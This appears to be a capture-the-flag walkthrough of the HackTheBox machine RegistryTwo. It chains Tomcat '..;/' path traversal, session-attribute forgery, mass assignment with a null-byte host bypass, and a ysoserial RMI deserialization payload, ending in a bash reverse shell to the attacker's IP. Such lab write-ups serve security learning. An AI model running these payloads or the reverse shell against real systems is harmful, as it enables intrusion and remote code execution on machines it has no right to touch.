[+] Downloading : 4a19a05f49c2d93e67d7c9ea8ba6c310d6b358e811c8ae37787f21b9ad82ac42
[+] Downloading : 9e700b74cc5b6f81ed6513fa03c7b6ab11a71deb8e27604632f723f81aca3268
[+] Downloading : b5ac54f57d23fa33610cb14f7c21c71aa810e58884090cead5e3119774a202dc
[+] Downloading : 396c4a40448860471ae66f68c261b9a0ed277822b197730ba89cb50528f042c7
[+] Downloading : 9d5bcc17fed815c4060b373b2a8595687502925829359dc244dd4cdff777a96c
[+] Downloading : ab55eca3206e27506f679b41b39ba0e4c98996fa347326b6629dae9163b4c0ec
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : f7b708f947c32709ecceaffd85287d5eb9916a3013f49c8416228ef22c2bf85e
[+] Downloading : 497760bf469e19f1845b7f1da9cfe7e053beb57d4908fb2dff2a01a9f82211f9
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : e4cc5f625cda9caa32eddae6ac29b170c8dc1102988b845d7ab637938f2f6f84
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : 0da484dfb0612bb168b7258b27e745d0febf56d22b8f10f459ed0d1dfe345110
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : 7b43ca85cb2c7ccc62e03067862d35091ee30ce83e7fed9e135b1ef1c6e2e71b
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : fa7536dd895ade2421a9a0fcf6e16485323f9e2e45e917b1ff18b0f648974626
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : 5de5f69f42d765af6ffb6753242b18dd4a33602ad7d76df52064833e5c527cb4
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : ff3a5c916c92643ff77519ffa742d3ec61b7f591b6b7504599d95a4a41134e28
They are all gzip data:
(venv) oxdf@hacky$ file hosting-app/*
hosting-app/0bf45c325a696381eea5176baa1c8e84fbf0fe5e2ddf96a22422b10bf879d0ba.tar.gz: gzip compressed data, original size modulo 2^32 2560
hosting-app/0da484dfb0612bb168b7258b27e745d0febf56d22b8f10f459ed0d1dfe345110.tar.gz: gzip compressed data, original size modulo 2^32 16436736
hosting-app/396c4a40448860471ae66f68c261b9a0ed277822b197730ba89cb50528f042c7.tar.gz: gzip compressed data, original size modulo 2^32 23533056
hosting-app/497760bf469e19f1845b7f1da9cfe7e053beb57d4908fb2dff2a01a9f82211f9.tar.gz: gzip compressed data, original size modulo 2^32 21474816
hosting-app/4a19a05f49c2d93e67d7c9ea8ba6c310d6b358e811c8ae37787f21b9ad82ac42.tar.gz: gzip compressed data, original size modulo 2^32 39337472
hosting-app/5de5f69f42d765af6ffb6753242b18dd4a33602ad7d76df52064833e5c527cb4.tar.gz: gzip compressed data, original size modulo 2^32 3584
hosting-app/7b43ca85cb2c7ccc62e03067862d35091ee30ce83e7fed9e135b1ef1c6e2e71b.tar.gz: gzip compressed data, original size modulo 2^32 2560
hosting-app/9d5bcc17fed815c4060b373b2a8595687502925829359dc244dd4cdff777a96c.tar.gz: gzip compressed data, original size modulo 2^32 5632
hosting-app/9e700b74cc5b6f81ed6513fa03c7b6ab11a71deb8e27604632f723f81aca3268.tar.gz: gzip compressed data, original size modulo 2^32 12288
hosting-app/a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4.tar.gz: gzip compressed data, truncated
hosting-app/ab55eca3206e27506f679b41b39ba0e4c98996fa347326b6629dae9163b4c0ec.tar.gz: gzip compressed data, original size modulo 2^32 3584
hosting-app/b5ac54f57d23fa33610cb14f7c21c71aa810e58884090cead5e3119774a202dc.tar.gz: gzip compressed data, original size modulo 2^32 4608
hosting-app/e4cc5f625cda9caa32eddae6ac29b170c8dc1102988b845d7ab637938f2f6f84.tar.gz: gzip compressed data, original size modulo 2^32 118784
hosting-app/f7b708f947c32709ecceaffd85287d5eb9916a3013f49c8416228ef22c2bf85e.tar.gz: gzip compressed data, original size modulo 2^32 2048
hosting-app/fa7536dd895ade2421a9a0fcf6e16485323f9e2e45e917b1ff18b0f648974626.tar.gz: gzip compressed data, original size modulo 2^32 78615552
hosting-app/ff3a5c916c92643ff77519ffa742d3ec61b7f591b6b7504599d95a4a41134e28.tar.gz: gzip compressed data, original size modulo 2^32 4403200
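Each blob is a gzipped tarball holding that layer’s filesystem diff, named by the sha256 of its compressed bytes. A self-contained sketch that builds a tiny fake layer in memory and unpacks it the same way a downloaded blob would be (the file name inside is illustrative):

```python
import hashlib
import io
import tarfile

# Build a tiny fake layer blob (a gzipped tar) entirely in memory
buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode="w:gz") as tar:
    data = b"example contents"
    info = tarfile.TarInfo("etc/hosting.ini")  # illustrative path
    info.size = len(data)
    tar.addfile(info, io.BytesIO(data))
blob = buf.getvalue()

# The registry names each blob by the sha256 of its compressed bytes
digest = "sha256:" + hashlib.sha256(blob).hexdigest()

# Unpacking a downloaded blob works the same way
with tarfile.open(fileobj=io.BytesIO(blob), mode="r:gz") as tar:
    names = tar.getnames()
print(digest, names)
```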
I could dig into each of these layers individually, which would show me what stands out from the base image, but rather than enumerating them all, I’ll just run the container and take a look:
oxdf@hacky$ docker run --rm -d webhosting.htb:5000/hosting-app
d96217d9cf0df1eee04a0d3e2a0c35cae682ceeb568629db044b030eff527307
Looking at the running image shows the image command is catalina.sh run
:
oxdf@hacky$ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
d96217d9cf0d webhosting.htb:5000/hosting-app "catalina.sh run" 8 seconds ago Up 7 seconds 8080/tcp unruffled_kilby
Catalina is the Tomcat servlet container. catalina.sh
is part of Tomcat, and the run
command starts Catalina.
The script is in /usr/local/tomcat/bin/
:
oxdf@hacky$ docker exec -it --user root unruffled_kilby /bin/bash
bash-4.4# find / -name 'catalina.sh' 2>/dev/null
/usr/local/tomcat/bin/catalina.sh
In /usr/local/tomcat/webapps
there’s a hosting.war
file. This is the application that manages the website at /hosting
. I’ll copy it to my system from the container:
oxdf@hacky$ docker cp unruffled_kilby:/usr/local/tomcat/webapps/hosting.war .
Successfully copied 23.5MB to /home/oxdf/hackthebox/registrytwo-10.10.11.223/.
A Java WAR file is a Java archive containing all the files needed for a web application. I’ll open this one in jd-gui.
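A WAR is just a zip archive, so its layout can also be listed without jd-gui. A sketch using a tiny in-memory stand-in WAR (the entry paths mirror the real file’s layout but are illustrative):

```python
import io
import zipfile

# Build a tiny stand-in WAR with a few representative entries
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as war:
    war.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
    war.writestr("WEB-INF/web.xml", "<web-app/>")
    war.writestr("WEB-INF/classes/com/htb/hosting/rmi/RMIClientWrapper.class", b"")

# Listing the archive shows the same layout a decompiler renders
with zipfile.ZipFile(io.BytesIO(buf.getvalue())) as war:
    entries = war.namelist()
for name in entries:
    print(name)
```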
META-INF
has very basic metadata about the application. The resources
directory has CSS, and the .jsp
and .html
files at the bottom are templates for the various pages. The interesting stuff is in WEB-INF
. web.xml
is a basic config file. lib
has the various libraries used by the app:
jsp
has various templates for different pages on the site:
The `classes` directory has the code for the site:
The `class` files in `services` are the ones that define routes for the webserver. For example, `AuthenticationServlet.class` defines the `/auth/signin` route:
The `doGet` and `doPost` methods handle those requests, eventually making a `RequestDispatcher` referencing one of the `.jsp` files as a template. Other endpoints are defined at `/autosave`, `/reconfigure`, `/panel`, `/domains/*`, `/edit`, `/logout`, `/profile`, `/auth/signup`, and `/view/*`.
The `rmi` folder is of particular interest. RMI (Remote Method Invocation) is a Java idea kind of like remote procedure calls (RPC) in C, but rather than sending data structures, Java objects are passed between processes. This post does a really nice job of going into detail as to not only what RMI is, but how to pentest it (it is in Chinese, but Google Translate does a nice job).
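To make the model concrete, here's a minimal, self-contained sketch of the same pattern, with a hypothetical `Greeter` interface standing in for `FileService` and an arbitrary registry port: the "server" exports an implementation and binds it under a name in a registry, and the "client" looks that name up and invokes the stub as if it were a local object.

```java
import java.rmi.Remote;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.UnicastRemoteObject;

public class RmiDemo {
    // The remote interface: callers share only this contract, like FileService.
    public interface Greeter extends Remote {
        String greet(String name) throws RemoteException;
    }

    // Server-side implementation; clients never see this class.
    static class GreeterImpl implements Greeter {
        public String greet(String name) { return "hello " + name; }
    }

    public static void main(String[] args) throws Exception {
        // "Server": export the object and bind it under a name in a registry.
        GreeterImpl impl = new GreeterImpl();
        Registry registry = LocateRegistry.createRegistry(2099);
        registry.rebind("Greeter", UnicastRemoteObject.exportObject(impl, 0));

        // "Client": look the stub up by name and invoke it like a local object.
        Greeter stub = (Greeter) LocateRegistry.getRegistry("localhost", 2099)
                .lookup("Greeter");
        System.out.println(stub.greet("0xdf"));

        // Unexport both objects so the JVM can exit.
        UnicastRemoteObject.unexportObject(impl, true);
        UnicastRemoteObject.unexportObject(registry, true);
    }
}
```

The `lookup` / invoke half is exactly what the WAR does with `registry.lookup("FileService")`; the deserialization risk comes from the fact that arguments and return values cross the wire as serialized Java objects.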
The `RMIClientWrapper.class` file creates a `RMIClientWrapper` object, which gets the `FileService`:
public class RMIClientWrapper {
private static final Logger log = Logger.getLogger(com.htb.hosting.rmi.RMIClientWrapper.class.getSimpleName());
public static FileService get() {
try {
String rmiHost = (String)Settings.get(String.class, "rmi.host", null);
if (!rmiHost.contains(".htb"))
rmiHost = "registry.webhosting.htb";
System.setProperty("java.rmi.server.hostname", rmiHost);
System.setProperty("com.sun.management.jmxremote.rmi.port", "9002");
log.info(String.format("Connecting to %s:%d", new Object[] { rmiHost, Settings.get(Integer.class, "rmi.port", Integer.valueOf(9999)) }));
Registry registry = LocateRegistry.getRegistry(rmiHost, ((Integer)Settings.get(Integer.class, "rmi.port", Integer.valueOf(9999))).intValue());
return (FileService)registry.lookup("FileService");
} catch (Exception e) {
e.printStackTrace();
throw new RuntimeException(e);
}
}
}
The interesting part is that it loads the `rmi.host` value from the `Settings` class, and as long as it contains `.htb`, it will connect to it on port 9002. If I can get that to connect to me, there will be a way to exploit it.
There is a `/reconfigure` endpoint that is also interesting:
@WebServlet(name = "reconfigure", value = {"/reconfigure"})
public class ConfigurationServlet extends AbstractServlet {
private static final long serialVersionUID = -2336661269816738483L;
public void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException {
if (!checkManager(request, response))
return;
RequestDispatcher rd = request.getRequestDispatcher("/WEB-INF/jsp/configuration.jsp");
rd.include((ServletRequest)request, (ServletResponse)response);
}
public void doPost(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException {
if (!checkManager(request, response))
return;
Map<String, String> parameterMap = new HashMap<>();
request.getParameterMap().forEach((k, v) -> parameterMap.put(k, v[0]));
Settings.updateBy(parameterMap);
RequestDispatcher rd = request.getRequestDispatcher("/WEB-INF/jsp/configuration.jsp");
request.setAttribute("message", "Settings updated");
rd.include((ServletRequest)request, (ServletResponse)response);
}
private static boolean checkManager(HttpServletRequest request, HttpServletResponse response) throws IOException {
boolean isManager = (request.getSession().getAttribute("s_IsLoggedInUserRoleManager") != null);
if (!isManager)
response.sendRedirect(request.getContextPath() + "/panel");
return isManager;
}
public void destroy() {}
}
The POST request handler updates the `Settings` object with whatever is passed to it. There is, however, a call to `checkManager` before a user is allowed access via either GET or POST. This function checks that the `s_IsLoggedInUserRoleManager` attribute is set on the user's session object.
A common misconfiguration to look for in Tomcat servers is a path traversal with `..;/`. It has a section in HackTricks, and goes all the way back to the famous 2018 Blackhat presentation I've referenced many times, Breaking Parser Logic! by Orange Tsai:
Given that it seems clear that nginx is handing off to Tomcat at the `/hosting` level, it's worth trying there. If I try to visit `/hosting/..;/`, it returns an empty 404. That's different than if I visit `/hosting/0xdf`, which redirects to `/hosting/auth/signin`. That's a good sign this issue is present. I'll try `/hosting/..;/manager/html`, and it asks for basic auth:
When I don’t have the password, it shows the Tomcat auth failed page:
Even if I can’t access the Tomcat manager, that looks like path traversal.
Without creds, I can't access the Tomcat manager admin panel. Another thing to look for on Tomcat is the examples directory. Visiting `/hosting/..;/examples/` finds the page:
One example that shows up in a lot of bug bounty reports / blog posts (example, example, example) is `SessionExample`, in the "Servlet examples":
Through this page, I can get and set session attributes for my session. If I don’t have a session with the site, it looks empty like that. If I log in:
If I open a file for editing in the file editor on `www.webhosting.htb` and refresh this Sessions Example page, there's a new attribute associated with my session:

The attribute looks like `s_EditingMedia_[base64 id] = /tmp/[random hex]`. The URL for editing a file is `/hosting/edit?tmpid=[base64 id]`, matching that session attribute.
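A sketch of why that matters, using a plain map as a stand-in for the Tomcat session (the attribute name is taken from the observed session; the "trusts whatever path is stored" behavior is my assumption about how `/edit` works, and the files here are temp files standing in for the real ones):

```java
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.HashMap;
import java.util.Map;

public class SessionEditSketch {
    public static void main(String[] args) throws Exception {
        // Two files: the temp copy the editor created, and a file the
        // attacker shouldn't be able to read (stand-in for /etc/passwd).
        Path editorTmp = Files.createTempFile("media", ".html");
        Files.writeString(editorTmp, "<h1>index</h1>");
        Path secret = Files.createTempFile("secret", ".txt");
        Files.writeString(secret, "root:x:0:0:root:/root:/bin/bash");

        // Stand-in for the session store the /edit endpoint trusts.
        Map<String, String> session = new HashMap<>();
        session.put("s_EditingMedia_dGVzdA==", editorTmp.toString());

        // Normal flow: /edit?tmpid=dGVzdA== shows the temp file.
        System.out.println(Files.readString(Path.of(session.get("s_EditingMedia_dGVzdA=="))));

        // SessionExample lets me overwrite the attribute, so the same
        // request now reads whatever path I put there instead.
        session.put("s_EditingMedia_dGVzdA==", secret.toString());
        System.out.println(Files.readString(Path.of(session.get("s_EditingMedia_dGVzdA=="))));
    }
}
```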
I'll update the value of that session attribute to be `/etc/passwd` using the example form:
On reloading the `/edit` page, there's `/etc/passwd`:
Trying to save returns a 500 error (which makes sense, as this user almost certainly can’t write this file).
One unintended path is to use this file read to completely skip the Docker Registry stuff above, and pull the War file here. I’ll show that in Beyond Root.
I noticed above that I needed a manager session to get to `/hosting/reconfigure`. If I visit while just normally logged in, it redirects to `/hosting/panel`. But if I set `s_IsLoggedInUserRoleManager` to anything via the Session Example and try again, it works:
This panel gives the opportunity to change the max domains and index template.
Submitting the form on `/hosting/reconfigure` sends a POST request setting `domains.max` and `domains.start-template`:
POST /hosting/reconfigure HTTP/1.1
Host: www.webhosting.htb
Cookie: JSESSIONID=05DD8FF85C2D1D377E5C363008CD39A5
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
Origin: https://www.webhosting.htb
Referer: https://www.webhosting.htb/hosting/reconfigure
Connection: close
domains.max=6&domains.start-template=%3Cbody%3E%0D%0A%3Ch1%3E0xdf+was+here%21%3C%2Fh1%3E%0D%0A%3C%2Fbody%3E
Looking again at the code that handles POST requests, it doesn't seem to care which POST parameters are sent:
public void doPost(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException {
if (!checkManager(request, response))
return;
Map<String, String> parameterMap = new HashMap<>();
request.getParameterMap().forEach((k, v) -> parameterMap.put(k, v[0]));
Settings.updateBy(parameterMap);
RequestDispatcher rd = request.getRequestDispatcher("/WEB-INF/jsp/configuration.jsp");
request.setAttribute("message", "Settings updated");
rd.include((ServletRequest)request, (ServletResponse)response);
}
It just loops over all the POST parameters, maps them into a map object, and passes that to update the settings. That’s going to be vulnerable to mass assignment.
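A minimal sketch of that pattern (the `settings` map here is a hypothetical stand-in for the app's `Settings` store): because every submitted key is copied in with no allow-list, an extra parameter the form never sends still lands in the settings.

```java
import java.util.HashMap;
import java.util.Map;

public class MassAssignmentSketch {
    // Stand-in for the application's Settings store.
    static final Map<String, String> settings = new HashMap<>();

    // Mirrors the servlet's doPost: every parameter is copied in, no allow-list.
    static void updateBy(Map<String, String> params) {
        params.forEach(settings::put);
    }

    public static void main(String[] args) {
        settings.put("domains.max", "5");
        settings.put("rmi.host", "registry.webhosting.htb");

        // The form only intends to send domains.max and domains.start-template,
        // but nothing stops an extra attacker-controlled key.
        Map<String, String> post = new HashMap<>();
        post.put("domains.max", "6");
        post.put("rmi.host", "10.10.14.6");

        updateBy(post);
        System.out.println(settings.get("rmi.host")); // attacker value wins
    }
}
```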
The RMI class starts by getting the settings value for `rmi.host`, which I should be able to set via the mass assignment vulnerability above. However, it then checks that the value contains ".htb", setting it to "registry.webhosting.htb" if it doesn't:
String rmiHost = (String)Settings.get(String.class, "rmi.host", null);
if (!rmiHost.contains(".htb"))
rmiHost = "registry.webhosting.htb";
I can bypass this with a null byte. I'll send the `/hosting/reconfigure` POST request to Burp Repeater, and add `&rmi.host=10.10.14.6%00.htb` to the end:
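A quick check shows why this works: a Java `String` carries the NUL byte happily, so the `contains(".htb")` filter passes, while the native name-resolution layer the hostname eventually reaches treats the NUL as a string terminator and only sees my IP.

```java
public class NullByteSketch {
    public static void main(String[] args) {
        // %00 in the POST body decodes to a literal NUL inside the setting.
        String rmiHost = "10.10.14.6\u0000.htb";

        // The filter in RMIClientWrapper is satisfied...
        System.out.println(rmiHost.contains(".htb"));

        // ...but everything after the NUL is invisible to C-string consumers.
        System.out.println(rmiHost.substring(0, rmiHost.indexOf('\u0000')));
    }
}
```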
It seems to work. I'll start `nc` listening on 9002, and on loading `/hosting` in a browser, there's a connection:
oxdf@hacky$ nc -lnvp 9002
Listening on 0.0.0.0 9002
Connection received on 10.10.11.223 51140
JRMIK
One of HTB's top players, qtc, has a tool, remote-method-guesser, which has a `listen` mode:
Sometimes it is required to provide a malicious JRMPListener, which serves deserialization payloads to incoming RMI connections. Writing such a listener from scratch is not necessary, as it is already provided by the ysoserial project. remote-method-guesser provides a wrapper around the ysoserial implementation, which lets you spawn a JRMPListener
That's exactly what I need here. I'll need a copy of the ysoserial JAR file on my host. Mine is at `/opt/ysoserial/ysoserial-all.jar`. There are a bunch of issues with this tool on newer versions of Java. This issue on its GitHub talks about how to make it work with OpenJDK17, but also mentions it just works with OpenJDK11. I've got 11 installed on my system, so I'll just use `update-alternatives` to select it:
oxdf@hacky$ sudo update-alternatives --config java
There are 4 choices for the alternative java (providing /usr/bin/java).
Selection Path Priority Status
------------------------------------------------------------
0 /usr/lib/jvm/java-18-openjdk-amd64/bin/java 1811 auto mode
1 /usr/lib/jvm/java-11-openjdk-amd64/bin/java 1111 manual mode
* 2 /usr/lib/jvm/java-17-openjdk-amd64/bin/java 1711 manual mode
3 /usr/lib/jvm/java-18-openjdk-amd64/bin/java 1811 manual mode
4 /usr/local/java/jdk1.8.0_391/bin/java 1 manual mode
Press <enter> to keep the current choice[*], or type selection number: 1
update-alternatives: using /usr/lib/jvm/java-11-openjdk-amd64/bin/java to provide /usr/bin/java (java) in manual mode
This fixes errors like this:
oxdf@hacky$ java -jar /opt/ysoserial/ysoserial-all.jar CommonsCollections6 'wget 10.10.14.6/test'
Error while generating or serializing payload
java.lang.reflect.InaccessibleObjectException: Unable to make field private transient java.util.HashMap java.util.HashSet.map accessible: module java.base does not "opens java.util" to unnamed module @5a6d67c3
at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:354)
at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:297)
at java.base/java.lang.reflect.Field.checkCanSetAccessible(Field.java:178)
at java.base/java.lang.reflect.Field.setAccessible(Field.java:172)
at ysoserial.payloads.util.Reflections.setAccessible(Reflections.java:26)
at ysoserial.payloads.CommonsCollections6.getObject(CommonsCollections6.java:74)
at ysoserial.payloads.CommonsCollections6.getObject(CommonsCollections6.java:36)
at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
And this:
oxdf@hacky$ java -jar ./rmg.jar listen 10.10.14.6 9002 CommonsCollections6 'wget 10.10.14.6/test'
[+] Creating ysoserial payload... failed.
[-] Caught unexpected java.lang.reflect.InvocationTargetException during gadget generation.
[-] You probably specified a wrong gadget name or an invalid gadget argument.
[-] Cannot continue from here.
I'll clone `remote-method-guesser` to my system, and as in the install instructions, go into that directory. Before running `mvn package`, I'll edit `src/config.properties`, setting `yso = /opt/ysoserial/ysoserial-all.jar`. Now `mvn package` creates `target/rmg-5.0.0-jar-with-dependencies.jar`, which I'll move up a directory and rename `rmg.jar`.
At this point, I need to give `rmg.jar` a payload and a command. Both of these are a bit tricky. I know `commons-collections-3.1.jar` is on the server from the `lib` directory. That means the payloads `CommonsCollections1`, `CommonsCollections3`, `CommonsCollections5`, `CommonsCollections6`, and `CommonsCollections7` could work.
It also seems likely that I'll be dropping into a container (given such a complex web setup on an Insane box), so I'll have to try a few different Linux commands to see what works (`ping`, `curl`, `wget`). With some trial and error, I find that `CommonsCollections5` plus `wget` works.
I'll start `rmg`:
oxdf@hacky$ java -jar ./rmg.jar listen 10.10.14.6 9002 CommonsCollections5 'wget 10.10.14.6/rce'
[+] Creating ysoserial payload... done.
[+] Creating a JRMPListener on 10.10.14.6:9002.
[+] Handing off to ysoserial...
There's a relatively quick cleanup on the `rmi.host` variable, so I'll keep that POST request in Repeater so I can quickly resend it to set the value back to my host. After sending, I'll refresh `/hosting/panel`:
oxdf@hacky$ java -jar ./rmg.jar listen 10.10.14.6 9002 CommonsCollections5 'wget 10.10.14.6/rce'
[+] Creating ysoserial payload... done.
[+] Creating a JRMPListener on 10.10.14.6:9002.
[+] Handing off to ysoserial...
Have connection from /10.10.11.223:44232
Reading message...
Sending return with payload for obj [0:0:0, 0]
Closing connection
Just after, there's a hit on my Python webserver:
10.10.11.223 - - [29/Jan/2024 09:16:28] code 404, message File not found
10.10.11.223 - - [29/Jan/2024 09:16:28] "GET /rce HTTP/1.1" 404 -
Java is very picky about characters that break up commands, like `|`, `&`, and `;`. To be safe, I'll just get a shell in two steps. First, I'll create a `shell.sh` containing a simple bash reverse shell:
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.6/443 0>&1
I’ll have the server fetch this:
oxdf@hacky$ java -jar ./rmg.jar listen 10.10.14.6 9002 CommonsCollections5 'wget 10.10.14.6/shell.sh'
[+] Creating ysoserial payload... done.
[+] Creating a JRMPListener on 10.10.14.6:9002.
[+] Handing off to ysoserial...
Have connection from /10.10.11.223:52008
Reading message...
Sending return with payload for obj [0:0:0, 0]
RegistryTwo requests the script from my server:
10.10.11.223 - - [29/Jan/2024 09:17:52] "GET /shell.sh HTTP/1.1" 200 -
`wget` should save it in the current directory. I'll stop `rmg` and rerun it with a command to run the script:
oxdf@hacky$ java -jar ./rmg.jar listen 10.10.14.6 9002 CommonsCollections5 'bash shell.sh'
[+] Creating ysoserial payload... done.
[+] Creating a JRMPListener on 10.10.14.6:9002.
[+] Handing off to ysoserial...
Have connection from /10.10.11.223:33230
Reading message...
Sending return with payload for obj [0:0:0, 0]
Closing connection
This time there's a shell at `nc`:
oxdf@hacky$ nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.223 47188
bash: cannot set terminal process group (1): Not a tty
bash: no job control in this shell
bash-4.4$
It's not worth a full Beyond Root section, but `curl` didn't work because it's not in this container:
bash-4.4$ curl
bash: curl: command not found
`ping` is busybox, which isn't SetUID, so it fails:
bash-4.4$ ping 10.10.14.6
PING 10.10.14.6 (10.10.14.6): 56 data bytes
ping: permission denied (are you root?)
bash-4.4$ ls -l /bin/ping
lrwxrwxrwx 1 root root 12 Jan 9 2018 /bin/ping -> /bin/busybox
bash-4.4$ ls -l /bin/busybox
-rwxr-xr-x 1 root root 805024 Dec 12 2017 /bin/busybox
The intended way to get execution on the box is very similar to the attack I showed above, but rather than exploiting RMI, it messes with the JDBC connection string and performs a deserialization attack similar to what's shown here. It is slightly more complex to pull off, but uses the same building blocks, changing `mysql.host` rather than `rmi.host`, and without the need for the null byte.
The shell is in a container. There's a `.dockerenv` file in the system root, which is always a good sign:
bash-4.4$ ls -la /.dockerenv
-rwxr-xr-x 1 root root 0 Jul 4 2023 /.dockerenv
The container has a `docker0` interface but also shares the IP of the main host:
bash-4.4$ ifconfig
br-59a3a780b7b3 Link encap:Ethernet HWaddr 02:42:75:A5:14:1F
inet addr:172.19.0.1 Bcast:172.19.255.255 Mask:255.255.0.0
inet6 addr: fe80::42:75ff:fea5:141f/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:399519 errors:0 dropped:0 overruns:0 frame:0
TX packets:351989 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1212049149 (1.1 GiB) TX bytes:27562840 (26.2 MiB)
docker0 Link encap:Ethernet HWaddr 02:42:95:D0:18:38
inet addr:172.17.0.1 Bcast:172.17.255.255 Mask:255.255.0.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
eth0 Link encap:Ethernet HWaddr 00:50:56:B9:A1:E9
inet addr:10.10.11.223 Bcast:10.10.11.255 Mask:255.255.254.0
inet6 addr: dead:beef::250:56ff:feb9:a1e9/64 Scope:Global
inet6 addr: fe80::250:56ff:feb9:a1e9/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1464323 errors:0 dropped:0 overruns:0 frame:0
TX packets:1654034 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:216693743 (206.6 MiB) TX bytes:1715473938 (1.5 GiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:5564363 errors:0 dropped:0 overruns:0 frame:0
TX packets:5564363 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:723677305 (690.1 MiB) TX bytes:723677305 (690.1 MiB)
veth6283b47 Link encap:Ethernet HWaddr EE:0A:E8:AD:8F:93
inet6 addr: fe80::ec0a:e8ff:fead:8f93/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:368307 errors:0 dropped:0 overruns:0 frame:0
TX packets:320511 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1209629999 (1.1 GiB) TX bytes:21909415 (20.8 MiB)
veth9ec563c Link encap:Ethernet HWaddr 76:B5:59:8D:6A:4B
inet6 addr: fe80::74b5:59ff:fe8d:6a4b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:31212 errors:0 dropped:0 overruns:0 frame:0
TX packets:31717 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:8012416 (7.6 MiB) TX bytes:5670395 (5.4 MiB)
That's not something seen often on HTB. It comes from Docker using the host network driver:
If you use the `host` network mode for a container, that container's network stack isn't isolated from the Docker host (the container shares the host's networking namespace), and the container doesn't get its own IP address allocated. For instance, if you run a container which binds to port 80 and you use `host` networking, the container's application is available on port 80 on the host's IP address.
app’s home directory is very bare:
bash-4.4$ ls -la ~
total 16
drwxr-sr-x 1 app app 4096 Jul 5 2023 .
drwxr-xr-x 1 root root 4096 Jul 5 2023 ..
-rw------- 1 app app 216 Jan 29 21:14 .bash_history
The only visible process is the Tomcat server. There’s nothing interesting in the Tomcat directories.
The WAR file makes a connection to `registry.webhosting.htb:9002` for RMI. That host is defined as this machine in the `/etc/hosts` file:
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
127.0.0.1 registry.webhosting.htb
Looking at the listening ports, it is listening on 9002:
bash-4.4$ netstat -tnlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN -
